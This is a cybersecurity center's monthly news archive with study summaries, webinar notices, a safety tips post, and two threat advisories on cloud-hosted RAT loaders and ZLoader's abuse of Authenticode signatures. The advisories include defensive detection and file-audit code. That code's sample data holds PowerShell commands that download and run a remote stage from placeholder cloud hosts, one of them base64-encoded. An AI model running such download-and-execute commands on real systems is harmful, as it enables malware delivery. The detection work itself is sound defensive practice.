Monthly Archives: January 2022

FIU Study Shows Men Were Twice As Likely to Be Targeted by Online Sex Blackmailing During Pandemic

According to a recent study conducted by Florida International University and the Cyber Civil Rights Initiative (CCRI), men were twice as likely as women to fall victim to the cyber-enabled crime known as “sextortion” during the pandemic.

Also known as online sex blackmailing, this cybercrime is a form of extortion in which the blackmailer threatens to publish explicit private images or videos online unless their demands are met. The survey of more than 2,000 U.S. adults showed that young people, Black and Native American women, and LGBTQ individuals were also at higher risk of being targeted.

January 31, 2022

Episode 21: Chase Fopiano – a kindhearted former police officer who embodies all the qualities of a great leader

January 28, 2022

UCF Study Shows 2/3 of Employees Neglect Cyber Policies

A recent study conducted by UCF researchers on insider threats in remote work places shows that employee apathy towards security policies may be partially to blame for the drastic increase in attacks against remote workers in recent years. According to results from the study, two-thirds of employees admitted to failing to fully adhere to cybersecurity policies at their companies.

January 26, 2022

UCF Study Shows 2/3 of Employees Neglect Cyber Policies

In the past two years, cybersecurity threats against remote workforces have risen drastically, and employee apathy towards security policies may be partially to blame. Researchers Clay Posey and Mindy Shoss from the University of Central Florida (UCF) interviewed and studied 330 remote workers and found that two-thirds of employees admitted to failing to fully adhere to cybersecurity policies at their company at least once every 10 workdays. When asked why they didn’t follow security policies, a majority of respondents answered that they ignored policies to better accomplish tasks for their jobs or to help others get their work done. In fact, employees had malicious intent in only 3% of incidents where cybersecurity rules were broken.

According to CIODive, it is becoming more common for bad actors to approach employees to aid in an attack. Nearly two-thirds of IT and security professionals say their employees have been “approached to assist in aiding ransomware attacks,” while only half of respondents claimed to feel moderately prepared to prevent a ransomware attack.

January 26, 2022

Amazon, Azure, Clouds Host RAT-ty Trio in Info-stealing Campaign

I. Targeted Entities

  • Amazon Web Services
  • Azure Cloud Services

II. Introduction

Cybercriminals are taking advantage of Amazon Web Services (AWS) and Azure Cloud services to deliver a trio of remote access trojans (RATs), all aimed to collect sensitive information from select users. According to researchers at Cisco Talos, threat actors have been distributing variants of the malware known as AsyncRAT, Netwire, and Nanocore since October 2020, mainly to targets in Italy, Singapore, South Korea, Spain, and the United States.

III. Background Information

The attacks start with a phishing email containing a malicious .zip attachment, but the criminals also have a cloud-based trick that can be used: “the .zip archive files contain an ISO image with a malicious loader in the form of JavaScript, a Windows batch file or Visual Basic script. When the initial script is executed on the victim’s machine, it connects to a download server to download the next stage, which can be hosted on an Azure Cloud-based Windows server or an AWS EC2 instance,” say Talos researchers.[1]

Researchers say that hosting the payloads on cloud services is a decision made in order to avoid detection while cutting the costs of the campaign, since the attackers don’t have to set up their own infrastructure. It also makes it more difficult for defenders to track down the attackers. The threat actor behind this campaign maintains a distributed infrastructure consisting of download servers, command-and-control servers (C2s), and malicious subdomains, researchers said.[2] The download servers are hosted on Microsoft Azure and AWS. These well-known cloud services are chosen because of the trust the public places in these companies to be secure. Network defenders may assume that communications to an IP address owned by Microsoft or Amazon are innocent because of the multitude of benign communications they frequently see to those providers across multiple services.

Further, the main JavaScript downloader used in this campaign uses a four-layer, complex obfuscation technique in its script. Researchers say, “Each stage of the deobfuscation process results with the decryption methods for the subsequent stages to finally arrive at the actual malicious downloader method. The deobfuscation process is performed at each stage with every next stage generated as the result of the previous stage deobfuscation function.”[2] The batch script has an obfuscated command that runs PowerShell to download and run a payload from a download server on Azure cloud. Obfuscated VB downloaders execute a PowerShell command, which runs and connects to the download server running on AWS EC2.[2] To avoid detection, the attackers use the DuckDNS dynamic DNS service to change the domain names of the C2 hosts. Talos researchers found that the threat actors have registered several malicious subdomains using the service.[2]

The RATs used in this campaign include:

  • AsyncRAT: used to remotely monitor and control computers through a secure, encrypted connection to a C2 server. It also contains a keylogger, a screen recorder, and a system configuration manager, which allow the attacker to steal confidential data from the victim’s machine
  • NetwireRAT: a known threat used by attackers to steal victims’ passwords, login credentials, and credit card data. It can also remotely execute commands and collect file-system information
  • Nanocore: a 32-bit .NET portable executable, first seen in 2013. The version used in this campaign contains two plugins, called Client and SurveillanceEX. Client handles the communications with the C2 server, and SurveillanceEX captures video and audio, as well as monitoring remote desktop activity.[2]

Talos researchers suggest that organizations deploy comprehensive multi-layered security controls to detect similar threats and safeguard their assets. “Defenders should monitor traffic to their organization and implement robust rules around the script execution policies on their endpoints. It is even more important for organizations to improve email security to detect and mitigate malicious email messages, and break the infection chain as early as possible.”
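The infection chain described above (ISO-delivered JS/BAT/VBS loader, PowerShell fetching the next stage from an Azure or EC2 host, DuckDNS names for C2) lends itself to a few endpoint detection rules. The block below is an added example, not Talos’s or Threatpost’s code; it runs three such rules over constructed process-creation and DNS events. The cloud VM hostname suffixes and every hostname in the sample data are assumptions and placeholders, not indicators from the report.

```python
import base64
import re
from dataclasses import dataclass

# Script hosts that, in the chain above, launch PowerShell from the ISO-delivered loader.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}
# PowerShell download primitives commonly used to fetch a second stage.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I)
# Hostname suffixes of self-managed cloud VMs (assumption: the report only says the stages sit
# on an Azure-hosted Windows server or an AWS EC2 instance).
CLOUD_VM_SUFFIXES = (".cloudapp.azure.com", ".amazonaws.com")
DYN_DNS_SUFFIX = ".duckdns.org"
URL_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)", re.I)
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


@dataclass
class Alert:
    rule: str
    detail: str


def expand_encoded(cmd: str) -> str:
    """Append the decoded text of a -EncodedCommand argument (base64 of UTF-16LE) to cmd."""
    m = ENC_RE.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1)).decode("utf-16le", "ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return cmd


def check_process(ev: dict) -> list:
    """R1: a script host spawns PowerShell. R2: PowerShell downloads from a cloud VM host."""
    alerts = []
    parent = ev.get("parent_image", "").lower().split("\\")[-1]
    image = ev.get("image", "").lower().split("\\")[-1]
    if image != "powershell.exe":
        return alerts
    if parent in SCRIPT_HOSTS:
        alerts.append(Alert("R1", f"{parent} spawned powershell.exe"))
    cmd = expand_encoded(ev.get("command_line", ""))  # obfuscated loaders often use -enc
    if DOWNLOAD_RE.search(cmd):
        for host in URL_RE.findall(cmd):
            if host.lower().endswith(CLOUD_VM_SUFFIXES):
                alerts.append(Alert("R2", f"download from cloud-hosted VM {host}"))
    return alerts


def check_dns(ev: dict) -> list:
    """R3: query for a DuckDNS dynamic-DNS name, the service the campaign's C2 hosts hide behind."""
    name = ev.get("query", "").lower().rstrip(".")
    return [Alert("R3", f"dynamic DNS query {name}")] if name.endswith(DYN_DNS_SUFFIX) else []


def scan(events: list) -> list:
    alerts = []
    for ev in events:
        alerts.extend(check_process(ev) if ev["type"] == "process" else check_dns(ev))
    return alerts


def _b64_ps(text: str) -> str:
    """Encode text the way PowerShell -EncodedCommand expects (used only to build sample data)."""
    return base64.b64encode(text.encode("utf-16le")).decode()


# Constructed telemetry; hostnames are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    {"type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe", "command_line": r'wscript.exe "D:\invoice.js"'},
    {"type": "process", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -enc " + _b64_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://stage-vm.cloudapp.azure.com/s2')")},
    {"type": "process", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -c iwr http://ec2-placeholder.compute.amazonaws.com/s2 -OutFile a.exe"},
    {"type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell Get-ChildItem"},
    {"type": "dns", "query": "placeholder-c2.duckdns.org"},
    {"type": "dns", "query": "login.microsoftonline.com"},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(a.rule, a.detail)
```

R1 on its own will fire on some legitimate administrative scripts; it is the combination with R2 or R3 on the same host that is worth escalating.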

Miclain Keffeler, an application security consultant at nVisium, noted that the rise in the adoption of cloud technologies has forced a shift in security. But this shift means that cloud providers should also ensure that their systems are secure, saying that it is important for malicious usage of their services to be halted immediately when found. “These kinds of attacks aren’t going anywhere, so it’s important that cloud providers like AWS and Microsoft Azure step in to develop more processes around the notification of malicious use cases — especially given the complex nature of the current threatscape.”[2]

IV. MITRE ATT&CK

  • T1005 – Data From Local System
    Threat actors can search through local system sources such as local databases to find sensitive data prior to exfiltration.
  • T1063 – Security Software Discovery
    Attackers can become aware of which configurations, software, and sensors that are currently running in a system.
  • T1555 – Credentials From Password Stores
    Can retrieve passwords from mail and messaging applications.
  • T1105 – Ingress Tool Transfer
    Payload set to download from C2 onto the compromised host.
  • T1059 – Command and Scripting Interpreter
    Opens remote command-line interface and executes commands used in JavaScript files.

For more MITRE ATT&CK techniques, please consult the MITRE ATT&CK table in the attached CPR report: https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/

V. Recommendations

  • Phishing Awareness Training
    Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should also be educated about new types of attacks and schemes to mitigate risk.
    Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
  • Set Antivirus Programs to Conduct Regular Scans
    Ensure that antivirus and anti-malware programs are scanning assets using up-to-date signatures.
  • Monitor Malware
    Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
  • Implement Strong Cyber Hygiene
    Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
    Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
  • Multi-layered Security Controls
    A multi-layered security system means having numerous components that shield multiple operational layers, so that a failure at one layer (for example, an email filter) is caught by another (for example, script execution policies on the endpoint).
  • Enhance Email Security
    Increasing email security allows for the detection and mitigation of malicious emails.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/xlo3kyjeye6q44qk3jusm2n1xin9cf32

VII. References

(1) Raghuprasad, Chetan, and Vanja Svajcer. “Nanocore, Netwire and AsyncRAT Spreading Campaign Uses Public Cloud Infrastructure.” Cisco Talos Intelligence Group, January 12, 2022. https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html.

(2) Seals, Tara. “Amazon, Azure Clouds Host Rat-Ty Trio in Info-Stealing Campaign.” Threatpost English Global, January 12, 2022. https://threatpost.com/amazon-azure-clouds-rat-infostealing/177606/.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya, Tural Hagverdiyev.

January 25, 2022

The Evolving Threat of Ransomware

Cyber Florida invites IT managers to a free webinar on a prolific threat facing all organizations: ransomware. How has it evolved recently? What should you be doing as a technology leader to better protect your organization? Learn about the latest tactics employed by cybercriminals and some easy, affordable best practices you can implement right away to significantly reduce your organization’s risk.

Speaker: Tyler Chancey, Cybersecurity Consultant, Scarlett Cybersecurity

What to Expect:

  • Newest attack trends in ransomware
  • Cutting-edge ransomware defense
  • Embracing a security-centric culture
  • Q&A

About the Speaker

Tyler Chancey is a University of Florida graduate currently acting as a Cybersecurity Consultant with Scarlett Cybersecurity. One of his core job responsibilities is evaluating and architecting cybersecurity solutions in order to facilitate a stronger security posture both internally and within clients’ networks. Another duty of a Cybersecurity Consultant within Scarlett Cybersecurity is the rigorous assessment of new security solutions for internal and client use.

Tyler also acts in a sales-support capacity and as a team lead for Scarlett’s Cyber Incident Response Team. His previous roles include extensive experience as a Security Operations Center Intrusion Analyst with a Fortune 10 company. Tyler interacts both behind the scenes and directly with clients in order to help Scarlett Cybersecurity create optimal cybersecurity solutions.

His degree is a BS in Computer Science issued from UF’s Herbert Wertheim College of Engineering. Tyler currently holds the GIAC Certified Forensic Analyst (GCFA) certification issued by the SANS Institute. Tyler also completed the associated SANS course, FOR508, in order to obtain hands-on experience with forensic analysis and incident response. On a non-technical level, Tyler attended the 12-week Dale Carnegie Breakthrough to Success course focused on improving professional and personal communication skills.

January 21, 2022

5 Cybersecurity Resolutions to Make in 2022

As we enter a new year, it is important for each of us to understand our responsibility in preventing cyberattacks. If you’re looking to start 2022 off with a clean digital slate, check out our latest blog post! We talk about realistic cybersecurity resolutions that you can make in 2022 to begin the journey of being more cyber-secure.

January 14, 2022

Ransomware: Everything You Wanted to Know But Were Afraid to Ask


Join us for our upcoming webinar on Cybersecurity Awareness! This webinar will be focused on providing ransomware awareness training to a non-technical audience. Tips, examples, and best practices will be included for all participants. The slides will be provided on-demand post-presentation for future reference.

Speaker: Tyler Chancey, Cybersecurity Consultant, Scarlett Cybersecurity

What to Expect:

  • Ransomware – How it Works and Trends
  • The Absolute Basics – Staying Safe
  • Commonly Asked Questions Regarding Ransomware
  • Q&A

About the Speaker

Tyler Chancey is a University of Florida graduate currently acting as a Cybersecurity Consultant with Scarlett Cybersecurity. One of his core job responsibilities is evaluating and architecting cybersecurity solutions in order to facilitate a stronger security posture both internally and within clients’ networks. Another duty of a Cybersecurity Consultant within Scarlett Cybersecurity is the rigorous assessment of new security solutions for internal and client use.

Tyler also acts in a sales-support capacity and as a team lead for Scarlett’s Cyber Incident Response Team. His previous roles include extensive experience as a Security Operations Center Intrusion Analyst with a Fortune 10 company. Tyler interacts both behind the scenes and directly with clients in order to help Scarlett Cybersecurity create optimal cybersecurity solutions.

His degree is a BS in Computer Science issued from UF’s Herbert Wertheim College of Engineering. Tyler currently holds the GIAC Certified Forensic Analyst (GCFA) certification issued by the SANS Institute. Tyler also completed the associated SANS course, FOR508, in order to obtain hands-on experience with forensic analysis and incident response. On a non-technical level, Tyler attended the 12-week Dale Carnegie Breakthrough to Success course focused on improving professional and personal communication skills.

January 14, 2022

5 Cybersecurity Resolutions To Make in 2022

The past two years have witnessed a massive spike in cybercrime as the world turned to technology for work, school, grocery shopping, connecting, and practically everything else during the global pandemic. This sudden shift left many individuals and businesses scrambling to find a sense of normalcy in our new digitally dependent world; in response, cybercriminals quickly took advantage with mass phishing campaigns, new ransomware variants, and other sophisticated attacks designed to target unsuspecting and vulnerable victims.

As we enter a new year, it is important for each of us to understand our responsibility in preventing cyberattacks. Cybersecurity can undoubtedly be challenging, but it doesn’t have to be! If you are looking to start 2022 off with a clean digital slate, consider the following cybersecurity “resolutions” that you can implement now to begin the journey of being more cyber-secure.

5 Cybersecurity Resolutions for the New Year

1. Clean up your password lists


Passwords are what protect your personal information from outside attacks. Imagine that you are the ruler of a village, and your enemies are making their way to attack. Would you employ a single guard to protect every building and person across the land? No! You would send out an army of guards, each with a specific post to protect, to increase your chances of a successful defense.

Your passwords work in the same way. Each of your online accounts needs its own unique password to ensure that your personal information is protected from potential attacks. If you reuse the same password for every account, all your personal information is at risk in an instant if that password is exposed by a cybercriminal seeking to infiltrate your accounts. Using an individual unique password for each account helps ensure that even if one password is exposed, your other accounts will remain protected.

2. Don’t believe everything you see


The spread of misinformation and disinformation has increased drastically in the past two years as attackers take advantage of the COVID-19 pandemic, political news, and other widely-debated topics to create tension and chaos among the public. Misinformation and disinformation are often referred to as “fake news”, and although both words refer to types of wrong or false information, only disinformation is wrong on purpose and is deliberately intended to deceive. Unfortunately, as the world remains in the midst of the pandemic and the U.S. faces another election around the corner, it’s likely that 2022 will see yet another influx of misinformation and disinformation being spread across social media and beyond. 

As we navigate through the upcoming year, think twice before you share. Just because it’s online does not mean that it’s true; often, people will knowingly create sensational content just to get you to click. One of the best ways to avoid becoming a misinformation and disinformation superspreader is to consider the 5 Ws when faced with new information.  

Ask yourself: 

  • Who is posting this information? Are they a reliable source? If not, can you find other credible sources to back up the information? 
  • What does the information look like? Are there facts or additional sources or is it simply someone’s opinion?  
  • Why are they sharing this information? Is the purpose to make you think or feel a certain way? 
  • When was this information released? 
  • Where did the source of information come from? Is it a credible source who is close to the issue in other ways?

3. Remain vigilant against phishing attacks


Phishing is one of the most common cyberattacks that can seriously impact both individuals and organizations. The COVID-19 pandemic and other global topics have given cybercriminals more fuel to target victims in their schemes, taking advantage of these hot topics to craft relevant messages and trick people into clicking on malicious links. Phishing attacks are most often delivered via email, text, or carefully crafted websites, but these messages can also be delivered on social media through the persona of a fake profile.

One thing many phishing attacks have in common is a sense of urgency, pressuring you into taking immediate action to avoid consequences. Other warning signs of phishing attacks may include poor grammar, mismatched URLs, generic greetings, urgent language, or requests for personal or financial information. When in doubt, always navigate directly to the website in question to confirm that the claim is legitimate before clicking on any links or sharing any personal information.

4. Don’t overshare on social media


While social media may seem relatively harmless aside from the common troll, oversharing can put you at a greater risk of becoming victim to an attack. Seemingly harmless details in your profile, posts, and photos can give cybercriminals the information they need to commit identity fraud, theft, and other targeted attacks.

We’ve all seen posts on social media with captions like, “So happy to get out of town for the week! #livinglife” accompanied by pictures of fruity cocktails, family selfies, and away-from-home adventures. While we may see these posts and feel a little jealous, cybercriminals and thieves see them as a sign that your home is unoccupied and vulnerable for a week, potentially giving them the opportunity to target and burgle your home.

Criminals are known to monitor social media to track victims and gather information about their daily routines. One of the dangers of oversharing on social media is that strangers not only know when you’re away on vacation; they can also get to know your daily schedule and when you’re going to be away. Whether you’re on vacation sharing live stories of your adventures or simply posting updates from your daily routine, oversharing this personal information can put you at serious risk of being targeted both on and off-screen.

Aside from monitoring the information that you post, be sure to check your social media profile settings to ensure that your personal information, posts, and photos are only viewable by people you know. Additionally, refrain from accepting friend requests from people you don’t know in real life; it’s possible that a cybercriminal is behind the screen with a fake profile.

5. Regularly update your software


How many times have you clicked “remind me later” when prompted to update your device software? We’ve all been there – procrastinating the 20-minute delay in our days until we are fed up with the constant reminders and finally give in.

While sometimes a nuisance, regularly updating your software is one of the best ways to protect your devices from a cyberattack. Not only do software updates fix bugs and improve overall function, but they also fix security weaknesses that make your device vulnerable, adding another layer of security against prying eyes even when you aren’t near your device.

January 13, 2022

Cybercriminal Group Exploits Microsoft’s E-Signature Verification

I. Targeted Entities

  • Online bank users

II. Introduction

An information-stealing campaign using ZLoader malware, which has been previously used to deliver other ransomware, has already claimed over 2,000 victims across more than 100 countries.

III. Background Information

Researchers at Check Point Research (CPR) discovered that the cybercriminal group “Malsmoke” has been taking advantage of Microsoft’s digital signature verification to steal user credentials and other sensitive information by delivering the ZLoader malware, which has also been used to distribute Ryuk and Conti ransomware in the past. (2) The threat actors have already claimed 2,170 victims in 111 countries, mainly in the U.S., Canada, and India.

ZLoader is a banking trojan that uses web injection to steal cookies, passwords, and other sensitive information from victims’ machines. (2) In September 2021, it caught the attention of the Cybersecurity and Infrastructure Security Agency (CISA) as a threat in the distribution of Conti and Ryuk ransomware. Attackers also used ZLoader as the delivery vehicle in multiple spearphishing campaigns, most notably at the beginning of the COVID-19 pandemic in March 2020. Again, in September of 2021, attackers spread ZLoader via Google AdWords in a campaign that used a tool to disable all Windows Defender modules on victims’ machines. (2)

This latest malware campaign by Malsmoke leverages Java in its attack vector, starting its illicit activity by installing a legitimate remote management program that poses as a Java installation. Once this happens, the attacker has full access to the victim machine and is able to upload and download files as well as run scripts. Later, attackers run mshta.exe with the file appContast.dll as the parameter (which appears to be a Microsoft-trusted file) to deliver the payload. CPR researchers say that appContast.dll is signed by Microsoft, even though extra information has been added to the end of the file. CPR researchers also say that, “the added information downloads and runs the final Zloader [sic] payload, stealing user credentials and private information from victims.”

Kobi Eisenkraft, a malware researcher at CPR, says that the attackers have put in a great effort to evade detection. CPR has informed Microsoft and Atera, the maker of the remote management and monitoring tool, of their findings. CPR advises that Microsoft users apply Microsoft’s update for strict Authenticode verification immediately to avoid falling victim to the campaign. CPR also advises that people follow typical common-sense security practices: avoid installing programs from unknown sources, clicking on unfamiliar links, or opening unfamiliar attachments received in emails.
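The weakness the strict verification update closes is that a WIN_CERTIFICATE entry can carry bytes the embedded PKCS#7 object does not account for, so appended data rides along under a valid signature. The check below is an added example, not CPR’s or Microsoft’s code: it parses a PE, locates the Attribute Certificate Table and reports how many entry bytes fall outside the signature object, plus any data past the table. The sample PE it builds is a constructed stand-in whose “signature” is a placeholder DER SEQUENCE, not a real certificate.

```python
import struct

CERT_DIR_INDEX = 4  # IMAGE_DIRECTORY_ENTRY_SECURITY: offset/size of the Attribute Certificate Table


def der_total_length(blob: bytes) -> int:
    """Full encoded size (tag + length bytes + content) of the DER SEQUENCE at blob[0]."""
    if len(blob) < 2 or blob[0] != 0x30:
        raise ValueError("certificate entry does not start with a DER SEQUENCE")
    first = blob[1]
    if first < 0x80:                      # short-form length
        return 2 + first
    n = first & 0x7F                      # long form: n length bytes follow
    if n == 0 or n > 4 or len(blob) < 2 + n:
        raise ValueError("unsupported DER length encoding")
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")


def audit_authenticode_padding(pe: bytes) -> dict:
    """Report bytes in a PE's signature entry that the PKCS#7 object does not cover."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    opt = e_lfanew + 24                                   # optional header follows the COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    dirs = opt + (112 if magic == 0x20B else 96)          # data directories: PE32+ vs PE32
    cert_off, cert_size = struct.unpack_from("<II", pe, dirs + 8 * CERT_DIR_INDEX)
    if cert_size == 0:
        return {"signed": False, "suspicious": False, "slack": 0, "overlay": 0}
    dw_length, revision, cert_type = struct.unpack_from("<IHH", pe, cert_off)  # WIN_CERTIFICATE
    der_len = der_total_length(pe[cert_off + 8:cert_off + dw_length])
    slack = dw_length - 8 - der_len                       # entry bytes beyond the PKCS#7 object
    overlay = len(pe) - (cert_off + cert_size)            # bytes after the certificate table
    # Entries are padded to an 8-byte boundary, so 0-7 slack bytes are normal; more is not.
    return {"signed": True, "revision": revision, "cert_type": cert_type,
            "slack": slack, "overlay": overlay, "suspicious": slack >= 8 or overlay > 0}


def build_sample_pe(pad_bytes: int, overlay: bytes = b"") -> bytes:
    """Constructed minimal PE32+ with a placeholder 'signature' (a DER SEQUENCE of zeros,
    not a real PKCS#7 blob); pad_bytes extra bytes are tucked inside the certificate entry."""
    der = b"\x30\x82\x01\x2c" + b"\x00" * 300                 # 304-byte DER SEQUENCE
    body = der + b"\x00" * pad_bytes
    dw_length = (8 + len(body) + 7) & ~7                      # round up to 8-byte boundary
    entry = struct.pack("<IHH", dw_length, 0x0200, 0x0002) + body
    entry += b"\x00" * (dw_length - len(entry))
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                     # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x22)  # x64, 0 sections, 240-byte opt hdr
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                     # PE32+ magic
    cert_off = 64 + 4 + 20 + 240
    struct.pack_into("<II", opt, 112 + 8 * CERT_DIR_INDEX, cert_off, dw_length)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + entry + overlay


if __name__ == "__main__":
    for label, sample in (("clean", build_sample_pe(0)), ("padded", build_sample_pe(64)),
                          ("overlay", build_sample_pe(0, b"\x00" * 32))):
        print(label, audit_authenticode_padding(sample))
```

This is a file-level triage check, not signature validation; Windows itself only rejects such padded entries once the EnableCertPaddingCheck registry value described in Microsoft Security Advisory 2915720 is set.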

IV. MITRE ATT&CK

  • T1204 – User Execution
    ZLoader relies upon specific actions by a user in order to gain execution.
  • T1036 – Masquerading
    ZLoader manipulates features of its artifacts to make them appear legitimate or benign to users and security tools.
  • T1112 – Modify Registry
    ZLoader interacts with the Windows Registry to hide configuration information within Registry keys, and to aid in execution.
  • T1041 – Exfiltration Over C2 Channel
    ZLoader steals data by exfiltrating the data over an existing command and control server.

For more MITRE ATT&CK techniques, please consult the MITRE ATT&CK table in the attached CPR report: https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/

V. Recommendations

  • Phishing Awareness Training
    Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should also be educated about new types of attacks and schemes to mitigate risk.
    Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
  • Set Antivirus Programs to Conduct Regular Scans
    Ensure that antivirus and anti-malware programs are scanning assets using up-to-date signatures.
  • Monitor Malware
    Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
  • Implement Strong Cyber Hygiene
    Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
    Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
  • Turn on Endpoint Protection
    Enable endpoint detection and response (EDR) to stop unknown malware in the product you’re using.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/etguhg3nrjxrag2km48awhxlvxlg6p81

VII. References

(1) Cohen, Golan. “Can You Trust a File’s Digital Signature? New Zloader Campaign Exploits Microsoft’s Signature Verification Putting Users at Risk.” Check Point Research, January 5, 2022. https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/.

(2) Montalbano, Elizabeth. “‘Malsmoke’ Exploits Microsoft’s E-Signature Verification.” Threatpost English Global, January 5, 2022. https://threatpost.com/malsmoke-microsoft-e-signature-verification/177363/.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya, Tural Hagverdiyev.

January 10, 2022